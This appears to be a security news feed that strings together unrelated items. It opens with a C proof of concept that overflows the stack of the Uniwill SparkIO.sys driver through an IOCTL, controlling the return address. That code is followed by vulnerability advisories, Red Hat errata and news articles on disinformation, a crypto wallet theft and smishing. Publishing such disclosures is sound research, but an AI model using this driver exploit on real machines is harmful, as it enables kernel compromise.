The Uniwill SparkIO.sys driver 1.0 is vulnerable to a stack-based buffer overflow via IOCTL 0x40002008.

/\*

IOCTL 0x40002004 : Arbitrary Physical Memory Read using MmMapIoSpace

IOCTL 0x40002008 : Close a handle of your choice! + Stack-based Buffer Overflow

IOCTL 0x40002000 : Arbitrary RW to IO ports

\*/

#include <Windows.h\>

#include <stdio.h\>

#define GLE( x ) { printf("%s failed with error: %d\\n", x , GetLastError()); }

#define IOCTL\_TRIGGER\_OVERFLOW 0x40002008

typedef struct BufferOverflow {

HANDLE reserved0;

DWORD64 reserved1\[6\];

DWORD64 ROP\_RET\_1;

DWORD64 reserved2\[20\];

} BufferOverflow, \* PBufferOverflow;

DWORD64 genPattern(BYTE b) {

DWORD64 retVal = b;

retVal |= retVal << 8;

retVal |= retVal << 16;

retVal |= retVal << 32;

return retVal;

}

NTSTATUS triggerOverflow(HANDLE hDevice, PBufferOverflow pOverflowData) {

DWORD64 dummy = 0;

DWORD dwBytesReturned = 0;

NTSTATUS status = DeviceIoControl(

hDevice,

IOCTL\_TRIGGER\_OVERFLOW,

pOverflowData,

sizeof(BufferOverflow),

&dummy,

sizeof(dummy),

&dwBytesReturned,

NULL

);

return status;

}

int main() {

BufferOverflow bo = { 0 };

NTSTATUS status = 0;

const char\* strDevName = R"(\\\\.\\SparkIO)";

puts("Opening device");

HANDLE hFile = CreateFileA(strDevName, GENERIC\_READ | GENERIC\_WRITE, FILE\_SHARE\_READ | FILE\_SHARE\_WRITE, NULL, OPEN\_EXISTING, FILE\_ATTRIBUTE\_NORMAL, NULL);

if (hFile == (HANDLE)0 || hFile == INVALID\_HANDLE\_VALUE) {

GLE("CreateFileA");

return -1;

}

puts("Opened handle to device");

puts("Triggering buffer overflow... Press any key to continue...");

getchar();

// set the return address to 0x4141414141414141

bo.ROP\_RET\_1 = genPattern(0x41);

status = triggerOverflow(hFile, &bo);

if (status) {

GLE("Overflow Trigger Failed");

printf("%lx\\n", status);

return status;

}

}

CVE-2022-37415: Uniwill SparkIO.sys PoC

do_request in request.c in muhttpd before 1.1.7 allows remote attackers to read arbitrary files by constructing a URL with a single character before a desired path on the filesystem. This occurs because the code skips over the first character when serving files. Arris NVG443, NVG599, NVG589, and NVG510 devices and Arris-derived BGW210 and BGW320 devices are affected.

CVE-2022-31793: Arris / Arris-variant DSL/Fiber router critical vulnerability exposure

A global network of inauthentic news sites present themselves as independent news outlets, offering content favoring China's government and articles critical of the US.

A fake-news influence campaign based in China is leveraging at least 72 inauthentic news sites to push content strategically aligned with the political interests of the People's Republic of China (PRC) across the globe and in multiple languages.  

The sites are linked to a Chinese public-relations firm called Shanghai Haixun Technology, according to a report from Mandiant, which dubbed the campaign "HaiEnergy." To disseminate the content, the effort makes use of various social-media accounts with hundreds of thousands of followers. 

The purpose of the campaign is to target global audiences with messaging intended to improve the international image of China — and to discredit critics of its policies. According to the new Mandiant report, the campaign narratives include promoting the reform of Hong Kong's electoral system — giving the mainland government more control over choosing candidates — and criticizing the United States and its allies.

At the start of the month, several of the sites published articles critical of US House Speaker Nancy Pelosi's recently concluded trip to Taiwan, warning her to "stay away from Taiwan."

The content also attempts to discredit outspoken government opponents, including German anthropologist Adrian Zenz, who is known for his research on China's autonomous Xinjiang territory in the northwest, where there has been a reported genocide against the Uyghur population.

This was done via website articles and social-media posts, featuring what Mandiant suspects to be "at least three fabricated letters, based on obvious grammatical errors and typos."

One letter was observed being used by a Twitter account belonging to a suspected inauthentic persona "Jonas Drosten" (@Jonas\_drosten), who posted a tweet containing images of three letters. The tweet, and one of the letters, alleges that Adrian received "financial support from US Senator Marco Rubio and former White House Chief Strategist Steve Bannon."  

The Uyghur ethnic minority community has in the past been a target of multiple other disinformation efforts.

**Outsourcing Fake News Efforts**

Mandiant researchers were not able to determine whether Shanghai Haixun Technology is aware of the fakeness of the HaiEnergy effort, but the researchers found evidence that the campaign has leveraged services and infrastructure belonging to the PR firm to host and distribute content.  

The campaign's use of third-party infrastructure allows the operators behind the campaign to obfuscate their identities while distributing content. And the use of a PR firm in this campaign may also be suggestive of recent trends noted by Meta (PDF) regarding the increased outsourcing of influence operations to third parties.

The Mandiant report also notes that actors that use PR firms may also do so to lower the barrier to entry for such activity to actors with limited experience in such areas.

"The campaign does not appear to be particularly sophisticated, as evidenced at least in part by the seeming lack of substantial engagement outside of inauthentic amplification of its content," says Ryan Serabian, senior analyst at Mandiant.  

For instance, some of the social-media accounts outright note that they've been commissioned to promote content, and their bios suggest that they were willing to do "paid promos."

Serabian explains that social-media platforms, governments, and other organizations increasingly look to root out inauthentic information activity, so he expects that actors will adapt new tactics and strategies, like contracting PR firms, to continue to achieve their aims.

"As we've highlighted, such actors might seek to leverage PR firms to distribute content, and they may also become more inventive in the types of content they distribute, such as by way of using technology like artificial intelligence-generated 'deepfake' images and videos," he says.  

This particular operation follows the efforts of Russian operatives, and those allied with Russian interests, which unleashed a deluge of disinformation and fake news to try and sow fear and confusion in Ukraine following the invasion of that nation.

Massive China-Linked Disinformation Campaign Taps PR Firm for Help

Red Hat Security Advisory 2022-5840-01 - The Migration Toolkit for Containers enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Migration Toolkit for Containers (MTC) 1.7.3 security and bug fix update  
Advisory ID:       RHSA-2022:5840-01  
Product:           Red Hat Migration Toolkit  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5840  
Issue date:        2022-08-02  
CVE Names:         CVE-2018-25032 CVE-2018-1000858 CVE-2019-13050  
                   CVE-2019-17594 CVE-2019-17595 CVE-2019-18218  
                   CVE-2019-20838 CVE-2020-14155 CVE-2020-28915  
                   CVE-2020-29361 CVE-2020-29362 CVE-2020-29363  
                   CVE-2021-36084 CVE-2021-36085 CVE-2021-36086  
                   CVE-2021-36087 CVE-2021-40528 CVE-2021-41617  
                   CVE-2022-0778 CVE-2022-1271 CVE-2022-1365  
                   CVE-2022-1621 CVE-2022-1629 CVE-2022-22576  
                   CVE-2022-24407 CVE-2022-24675 CVE-2022-25313  
                   CVE-2022-25314 CVE-2022-27666 CVE-2022-27774  
                   CVE-2022-27776 CVE-2022-27782 CVE-2022-28327  
                   CVE-2022-29526 CVE-2022-29824  
====================================================================  
1. Summary:

The Migration Toolkit for Containers (MTC) 1.7.3 is now available.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The Migration Toolkit for Containers (MTC) enables you to migrate  
Kubernetes resources, persistent volume data, and internal container images  
between OpenShift Container Platform clusters, using the MTC web console or  
the Kubernetes API.

Security Fix(es):

* cross-fetch: Exposure of Private Personal Information to an Unauthorized  
Actor (CVE-2022-1365)

* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)

* golang: crypto/elliptic: panic caused by oversized scalar  
(CVE-2022-28327)

* golang: syscall: faccessat checks wrong group (CVE-2022-29526)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Velero and Restic are using incorrect SCCs [OADP-BL] (BZ#2082216)

* [MTC] Migrations gets stuck at StageBackup stage for indirect runs  
[OADP-BL] (BZ#2091965)

* MTC: 1.7.1 on OCP 4.6: UI is stuck in "Discovering persistent volumes  
attached to source projects" step (BZ#2099856)

* Correct DNS validation for destination namespace (BZ#2102231)

* Deselecting all pvcs from UI still results in an attempted PVC transfer  
(BZ#2106073)

3. Solution:

For details on how to install and use MTC, refer to:

https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2076133 - CVE-2022-1365 cross-fetch: Exposure of Private Personal Information to an Unauthorized Actor  
2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode  
2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar  
2082216 - Velero and Restic are using incorrect SCCs [OADP-BL]  
2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group  
2091965 - [MTC] Migrations gets stuck at StageBackup stage for indirect runs [OADP-BL]  
2099856 - MTC: 1.7.1 on OCP 4.6: UI is stuck in "Discovering persistent volumes attached to source projects" step  
2102231 - Correct DNS validation for destination namespace  
2106073 - Deselecting all pvcs from UI still results in an attempted PVC transfer

5. JIRA issues fixed (https://issues.jboss.org/):

MIG-1155 - Update to newer ansible runner image for hooks  
MIG-1242 - Must set upper bound on OADP dep to prevent jump to 1.1  
MIG-1254 - Investigate impact of deprecated Docker V2 Schema 1 for MTC on OCP3.11

6. References:

https://access.redhat.com/security/cve/CVE-2018-25032  
https://access.redhat.com/security/cve/CVE-2018-1000858  
https://access.redhat.com/security/cve/CVE-2019-13050  
https://access.redhat.com/security/cve/CVE-2019-17594  
https://access.redhat.com/security/cve/CVE-2019-17595  
https://access.redhat.com/security/cve/CVE-2019-18218  
https://access.redhat.com/security/cve/CVE-2019-20838  
https://access.redhat.com/security/cve/CVE-2020-14155  
https://access.redhat.com/security/cve/CVE-2020-28915  
https://access.redhat.com/security/cve/CVE-2020-29361  
https://access.redhat.com/security/cve/CVE-2020-29362  
https://access.redhat.com/security/cve/CVE-2020-29363  
https://access.redhat.com/security/cve/CVE-2021-36084  
https://access.redhat.com/security/cve/CVE-2021-36085  
https://access.redhat.com/security/cve/CVE-2021-36086  
https://access.redhat.com/security/cve/CVE-2021-36087  
https://access.redhat.com/security/cve/CVE-2021-40528  
https://access.redhat.com/security/cve/CVE-2021-41617  
https://access.redhat.com/security/cve/CVE-2022-0778  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-1365  
https://access.redhat.com/security/cve/CVE-2022-1621  
https://access.redhat.com/security/cve/CVE-2022-1629  
https://access.redhat.com/security/cve/CVE-2022-22576  
https://access.redhat.com/security/cve/CVE-2022-24407  
https://access.redhat.com/security/cve/CVE-2022-24675  
https://access.redhat.com/security/cve/CVE-2022-25313  
https://access.redhat.com/security/cve/CVE-2022-25314  
https://access.redhat.com/security/cve/CVE-2022-27666  
https://access.redhat.com/security/cve/CVE-2022-27774  
https://access.redhat.com/security/cve/CVE-2022-27776  
https://access.redhat.com/security/cve/CVE-2022-27782  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/cve/CVE-2022-29526  
https://access.redhat.com/security/cve/CVE-2022-29824  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuqtatzjgjWX9erEAQj0Cw/+Px30wY+lU4kEvevERJjBt6yHGvQnfqOr  
VPKv+1ikwiA/x95m8fHGNrT6iqahLIbmyRPnZUvUbsSH0TD/vsDYyI/RmPuxpqaE  
d5UjsnkjK4/+9nVSKWiiqpmq3fnmICvIlOYadpj3f6SuNiWGLhKivKLPdxgb9MU/  
eWl7XN7RiFenuSWo1znYlk+WgEXSE3ltfQ6AZ3G4/H2D440AQfbDDWel+361Ng9F  
LSrmi3G1bfrw1Ur3mA44QEr2BUVmZgAXvFiIWNXn6xeyfEQegNDrgFaELcY26RHy  
1KpcLme8jDn5hCZIuApkOnfeBC8M1xibqhDHWaQHHXflpIdJAYDD4ZrFpK/ka0NO  
WGqgBpktNGgIa1rhiOS7WkFPN/TLkgfikl38kw3Y/s8OgkLMt8QUQPm1Q4GyYeX+  
3HBS67gX0hP6QVIeEQx3mQBgxP97LH1dEiisNp6/YZd6XpGRrGZU+3cgiXa2G4tc  
irw7dDpJDWHqkLi9iTKcjRQpsghJqFL7qcZDxQPZYTD5peePPz7TSGoLzy0Ew8RO  
44bf2FoxGd0LmA0WdCczLOhYA2K1/Il13kMEjWiqN76WvRZ5b5JUpTiyuKHYhOLn  
rgbr4bVfkkfJFJfw/Gftrhz0xnIyYAE8ql6HULJzGwvS3VtZKw+IsSL6VRh6axsA  
NhP6/InC1K0=W1QN  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5840-01

Red Hat Security Advisory 2022-5821-01 - Kernel-based Virtual Machine offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems. Issues addressed include buffer overflow, integer overflow, and memory leak vulnerabilities.

Red Hat Security Advisory 2022-5821-01

Copado's Kyle Tobener will discuss a three-pronged plan at Black Hat USA for addressing human weaknesses in cybersecurity with this medical concept — from phishing to shadow IT.

It's a well-known fact that humans are — and will remain — one of the weakest links in any company's cyber defenses. Security admins have tried to help the situation through random phishing tests and training, ultimatums, eliminating local control over a given device, and even naming and shaming those unlucky souls who clicked on the wrong link in an email.

Results have been middling at best, as shown by the finding in Verizon's "2022 Data Breach Investigations Report" (DBIR) that the vast majority of breaches start with phishing and social engineering.

Kyle Tobener, vice president and head of security and IT at Copado, says that it doesn't have to be that way. Instead, businesses can take a page from the medical community and find a much more effective approach through the principle of harm reduction. That essentially means adopting a focus on minimizing or mitigating bad outcomes from bad behavior rather than attempting to eliminate bad behavior completely.

**How Harm Reduction Applies to Cybersecurity**

In a session next week at Black Hat USA entitled "Harm Reduction: A Framework for Effective & Compassionate Security Guidance," Tobener plans to discuss this fresh way of thinking about user behavior, education, and awareness when it comes to cyber threats.

"Harm reduction is a big topic in the healthcare space, but it hasn't really made its way into information security all that much," he tells Dark Reading, adding that as a cancer survivor and brother of someone who wrestled with substance addiction, he learned about harm reduction firsthand.

"Unfortunately, what we see is still mostly abstinence-based guidance in a lot of scenarios by security people," he says.

To illustrate the contrast between the two approaches, he uses the example of the attention-grabbing Super Bowl ad back in February from Coinbase, which featured a QR code bouncing around the screen, Pong-like.

"If you went to Twitter right after that, there were thousands of security people saying that you should never use a QR code if you don't know where that QR code's from," he says. "That guidance is not effective whatsoever. I'm sure millions of people have used a QR code, and if your focus is giving guidance that isn't practical or pragmatic, that people aren't going to follow, then it's going to be very ineffective and you're wasting an opportunity to educate those people in a way that's actually useful."

In a harm-reduction approach, the answer would have been to assume that people were going to click on such an intriguing item (and indeed, QR codes are so widespread in their use in general that asking people to never use them is a simple non-starter), and build a defensive strategy with that in mind.

"Educate them on what to look for once they do something like use a QR code," Tobener explains. "How do you know that the website you went to is a safe one? If you only tell people not to do something, and then they do it and they go to the website, and they're not prepared to look for red flags, they're going to be worse off than they would be."

**How to Deploy Harm Reduction**

In his Black Hat talk, Tobener plans to address the implementation of harm reduction in a cybersecurity context with a three-pronged approach, starting with fomenting acceptance that risk-taking behaviors are here to stay.

"I think this is a very pragmatic approach that a lot of security people aren't willing to take; they come with a mindset that risk can be eradicated, which is just not realistic," he notes. "Just like the war on drugs was not effective, Prohibition was not effective, and D.A.R.E. programs and 'scared straight' were actually shown to be more harmful than helpful in kids."

After gaining buy-in from security teams and powers that be on the impossibility of preventing risky actions, the next step is prioritizing the reduction of the negative consequences of those risky behaviors, and understanding which battles to fight when it comes to corporate security policies.

"For example, in an enterprise context, you might have an enterprise password manager that everyone is supposed to use," Tobener explains. "But there will be people who don't want to use the corporate-provided password manager because they're not familiar with it, and they want to use their own. Instead of making them stop what they're doing, consider whether using their own password manager is better than not using a password manager at all. In other words, are there bigger fish to fry?"

The third prong that he plans to cover in this Black Hat USA session is that of compassion.

"The final piece of the framework is kind of a weird one for cybersecurity, but it's really important in the harm reduction space: Embracing compassion while providing guidance," he says. "This one is probably the hardest concept for security people and even healthcare people to wrap their heads around, which is the idea of improving people's situations by being compassionate and supportive, even if you're supporting them in doing what you consider to be the wrong thing."

Just like social stigma makes people avoid drug treatment rather than accept it, the harsh attitude and conflict-fraught approach coming from some cybersecurity teams toward users is going to make people less likely to want to do the right thing, he explains. For instance, in the above shadow-IT password manager example, teams could send threatening emails to offenders or even get line managers involved; or, they could work out a compromise, offer ease-of-use training, and generally take a "we're with you not against you" tack when discussing the issue.

"By being supportive and compassionate, you show them that you accept them despite what they're doing, and that even though it's not perfect now, they have a chance to improve in the future," Tobener says. "Oftentimes, when you are compassionate with people, they will then educate themselves. And make better choices in the long run."

The session will look to give attendees practicable takeaways about becoming a more effective security practitione when it comes to managing users who aren't listening to you.

"I get really tired of seeing on Twitter people telling people 'do this or you deserve the consequences,'" Tobener says. "I'm trying to raise the security consciousness to a place where we stop telling people not to do things, and instead say, OK, you shouldn't do this, but if you do, here's how to do it more safely."

How IT Teams Can Use 'Harm Reduction' for Better Cybersecurity Outcomes

By Waqas
An unknown hacker targeted the Solana ecosystem on Wednesday and drained approx. $5 million worth of SOL and…
This is a post from HackRead.com Read the original post: 8,000 Solana Wallets Drained Millions Worth of Crypto in Cyberattack

****An unknown hacker targeted the Solana ecosystem on Wednesday and drained approx. $5 million worth of SOL and other tokens.****

The Solana blockchain has become the target of a cyberattack late Tuesday night, during which thousands of its wallets were drained of $4 to $5 million worth of Solana and USDC.

The attack originated from the Solana browser wallet Phantom. Research revealed that the hacker compromised user keys, or **seedphrases**, which were then re-used on different chains. Solana’s representative Austin Federa confirmed that hardware wallets were safe.

For your information, Solana is Ethereum blockchain’s rival cryptocurrency ecosystem and has suffered network outages and security-related issues **previously**. However, although unconfirmed, there are also rumors that it could be an iOS-based supply chain attack.

> Seems like an iOS supply chain attack. Multiple plausible wallets that only received sol and had no interactions beyond receiving have been affected. https://t.co/ne0g3ZmLH5
> 
> As well as key that were imported into iOS, and generated externally.https://t.co/hStAr1mU6Q
> 
> — SMS T◎ly, 🇺🇸 (@aeyakovenko) August 3, 2022

It is worth noting that **in April 2022**, MetaMask warned Apple users to disable automatic iCloud backup of their wallet data. The warning resulted from the losses sustained by an NFT collector who reportedly lost $650,000 worth of digital assets after their MetaMask wallet was wiped out within seconds.

**Damages Caused by the Attack**

The damages vary as more than $5.2 million worth of crypto assets were stolen from over 5,000 wallets, explained blockchain forensics firm Elliptic. The company’s co-founder Tom Robinson said that the root cause of the attack isn’t yet clear, but from whatever is known, it appears to be caused by a “flaw in certain wallet software rather than in the Solana blockchain itself.”

Solna Status, a Twitter account run by Solana Foundation later confirmed that 8,000 wallets were targeted. The targeted currencies include SOL, SL, and several other Solana-based tokens from the Slope and Phantom digital wallets.

Blockchain audit firm OtterSec **shared** that the transactions were signed by the wallets’ owners, meaning private keys must have been compromised.

The Solana attack has irked the investor community as lately there has been an unprecedented surge in cybercrimes targeting crypto exchanges and wallets. Several of Solana’s traders took to Twitter to express disappointment, calling for a short position in the cryptocurrency.

A short position is initiated by a trader by selling a borrowed security or its futures contract/derivative to buy it back when the price is lower. After the attack, Solana’s SOL token plunged 7.3% and traded at $38.40 on Wednesday, marking its lowest this week.

> 🚨 Widespread Solana private key compromise 🚨
> 
> – attacker is stealing both native tokens (SOL) and SPL tokens (USDC)  
> – affecting wallets that have been inactive for >6 months  
> – both Phantom & Slope wallets reportedly drained pic.twitter.com/AkZXOGLD0Q
> 
> — foobar (@0xfoobar) August 3, 2022

1.  **$625m Stolen From The Blockchain Behind Axie Infinity Game**
2.  **Multichain hack: Hacker returns $1 million, keeps $150k as bug bounty**
3.  **NFT Marketplace OpenSea Suffers Data Breach- Users’ Email IDs Leaked**
4.  **Hackers Exploit Harmony’s Horizon Blockchain Bridge to Steal $100 Million**
5.  **LAZARUS APT Using TraderTraitor Malware to Target Blockchain Orgs, Users**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

8,000 Solana Wallets Drained Millions Worth of Crypto in Cyberattack

An improper access control vulnerability [CWE-284] in FortiOS versions 6.2.0 through 6.2.11, 6.4.0 through 6.4.8 and 7.0.0 through 7.0.5 may allow an authenticated attacker with a restricted user profile to gather the checksum information about the other VDOMs via CLI commands.

** PSIRT Advisories**

**FortiOS -- Inter-VDOM information leaking**

**Summary**

An improper access control vulnerability \[CWE-284\] in FortiOS may allow an authenticated attacker with a restricted user profile to gather the checksum information about the other VDOMs via CLI commands.

**Affected Products**

FortiOS version 7.0.0 through 7.0.5  
FortiOS version 6.4.0 through 6.4.8  
FortiOS version 6.2.0 through 6.2.11

**Solutions**

Please upgrade to FortiGate version 7.2.0 or above.  
Please upgrade to FortiGate version 7.0.6 or above.  
Please upgrade to FortiGate version 6.4.9 or above.

CVE-2022-23442: Fortiguard

Rising interest in chess may feed the next generation of cybersecurity experts.

The world of cybersecurity is not so different than a high-stakes chess game. In chess as in cybersecurity, players must outsmart their opponents, capitalize on their weaknesses in a timely and strategic manner, and think numerous steps ahead. As the need for cybersecurity grows in our increasingly digitized world, these skills will become more and more in demand.

With interest in chess booming, here are five ways in which strategic chess play can inspire the next generation of cybersecurity experts.

**1\. Understand Weaknesses**

Chess, unlike its board, isn't just black and white. The best chess players must have mastery over tactics, strategy, openings, endgames, and more. Players must memorize key moves and predictable patterns while solving chess puzzles to hone their ability to adapt to near-infinite scenarios. Each skill must be finetuned on its own before being combined into a sum greater than its parts, and no one player is perfect in every regard.

Similarly, there is also no such thing as 100% cybersecure. There’s a famous saying in the cybersecurity industry: "You can’t protect what you can’t see." As in chess, cybersecurity experts must steep themselves in what is visible – assets, vulnerabilities, threats, patterns of past attacks, and so on – to prepare for what is not _yet_ visible. Knowing that your own king is protected is as important as knowing when your opponent's king isn’t.

**2\. Get into the Minds of Opponents**

In chess, each turn is a complex effort to estimate what an opponent will do next and then determine how to respond to that estimated move, how the opponent will respond to the response, and so on. The very same principle is key to a good cybersecurity strategy. Getting insight into the opponent's mindset by studying past moves is key to intuiting future ones.

Using adversarial techniques, red teams, and vulnerability research, cybersecurity experts also attempt to find their own weaknesses. Sometimes a single weakness in security posture will be enough for an adversary to exploit the entire network – a dangerous gambit. The goal is to always stay ahead by knowing those weaknesses better (and sooner) than bad actors do. The adage "know thyself" is imperative – in cybersecurity, in chess, and in life.

**3\. Have a Plan — Any Plan**

"A bad plan is better than no plan." This quote from former World Chess Championship competitor Mikhail Chigorin should guide every chess player. Moving pieces without a clear guiding strategy makes it difficult to evaluate the situation and make required changes when needed. If you're making moves on the fly, you've already lost.

The cybersecurity world is noisier and filled with even more unknowable possibilities than a chess game. Thus, it is critical to ensure that every security decision an organization makes is part of a thoughtful, comprehensive long-term strategy, built around concrete objectives. Incident planning, for example, is a good way to ensure that once an incident occurs and panic likely ensues, the right controls and processes will already be in place.

**4\. Keep Time on Your Side**

Time is a key element in chess. If you don’t organize your pieces fast enough, your opponent will get an advantage. If you play too slow, you'll be pressured later to make suboptimal decisions.

As a cyber defender, the growing number of increasingly sophisticated threat actors forces you to outsmart an unpredictable opponent faster than they outsmart you. And the playing field isn't just an eight-by-eight checkered board right in front of you. In the cybersecurity game, opponents ceaselessly attempt to exploit your systems, and they do so along myriad invisible, global digital connections.

Be timely, or be hacked.

**5\. Automate … Everything**

The advent of computers has changed chess dramatically. When the Deep Blue computer beat World Champion Garry Kasparov in 1997, chess programs became a must-have for every professional player. These programs enable players to analyze games and prepare for matches while allowing them to focus on creativity and strengthen weaknesses in a controlled environment.

For cybersecurity, the use of automation whenever possible is key to staying ahead of the meteoric rise in the number of devices and types of connectivity; it is simply impossible for the human brain to keep track of so much at once. Having the right automated cybersecurity tools will allow security staff to focus on the most important challenges, without leaving basic security functions unaddressed.

**Endgame**

The Internet has made it easier than ever for anyone to learn and play chess. This is beneficial for an increasingly online generation, challenging young minds in new ways and potentially positioning them as the cybersecurity experts of the future.

5 Ways Chess Can Inspire Strategic Cybersecurity Thinking

Categories: News
Tags: PII

Tags: smishing

Tags: FCC

Tags: SMS phishing

Tags: Robokiller

Tags: STIR

Tags: SHAKEN

Smishing attacks, or phishing attempts via SMS, are on the rise, and Americans are fighting off billions of spam messages each month.



(Read more...)




The post FCC warns of steep rise in phishing over SMS appeared first on Malwarebytes Labs.

After the FCC (Federal Communications Commission) made a huge splash weeks ago when it told Google and Apple to pull TikTok from their respective app stores, the federal agency is now warning Americans of an increased wave of SMS phishing attacks.

SMS phishing, otherwise known as smishing or robotexts (FCC’s own terminology), is a form of phishing that attempts to trick people into handing over their personally identifiable information (PII) and/or money using SMS instead of email, which standard phishing usually starts. The FCC has noted that scammers use various lures to trick someone into replying, giving out their information, or clicking a link.

“Like robocallers, a robotexter may use fear and anxiety to get you to interact,” the FCC consumer alert reads. “Texts may include false-but-believable claims about unpaid bills, package delivery snafus, bank account problems or law enforcement action against you. They may provide confusing information—as if they were texting someone else—, incomplete information, or utilize other techniques to spur your curiosity and engagement.”

What motivates criminals to engage in smishing tactics is to get money and personal information or to simply confirm that the number they’re messaging is active, so they can target it in future scam campaigns.

According to the FCC, it tracks consumer complaints instead of text volume. The agency noted a steady climb of unwanted SMS messages, from approximately 5,700 in 2019 to 8,500 by June 30, 2022. 

A separate study confirmed this, too, but revealed more sobering numbers. RoboKiller, an app that screens scammy calls and messages, found that Americans were sent a mind-blowing 12 billion spam texts in July 2022.

“That’s nearly **_44 spam texts_** for every person in the country!” And the numbers were no different in June and May 2022.

RoboKiller also pointed out in the report that spam texts have outpaced spam calls for two consecutive years. And one of the notable reasons for this is the FCC mandating the STIR (Secure Telephone Identity Revisited) and SHAKEN (Signature-based Handling of Asserted information using toKENs) framework, which was designed to curb spam calls. It’s effective, which is why scammers switched to spam texts.

The FCC posted bite-sized, back-to-back tweets on signs of scam text messages and how Americans can avoid getting scammed.

> How to protect yourself from #scam robotexts:  
> ▪️ Do not respond  
> ▪️ Do not click on any links  
> ▪️ Do not provide any info  
> ▪️ File an FCC complaint  
> ▪️ Forward unwanted texts to SPAM (7726)  
> ▪️ Delete all suspicious texts
> 
> — The FCC (@FCC) July 28, 2022

When you receive a spam text, do not engage with the sender.

Ignore them, but file a complaint to the FCC.

Finally, if you think you were the victim of an SMS text scam, the FCC recommends you report the incident to your local law enforcement agency and notify your bank and mobile carrier.

Stay safe!

Tag

#ios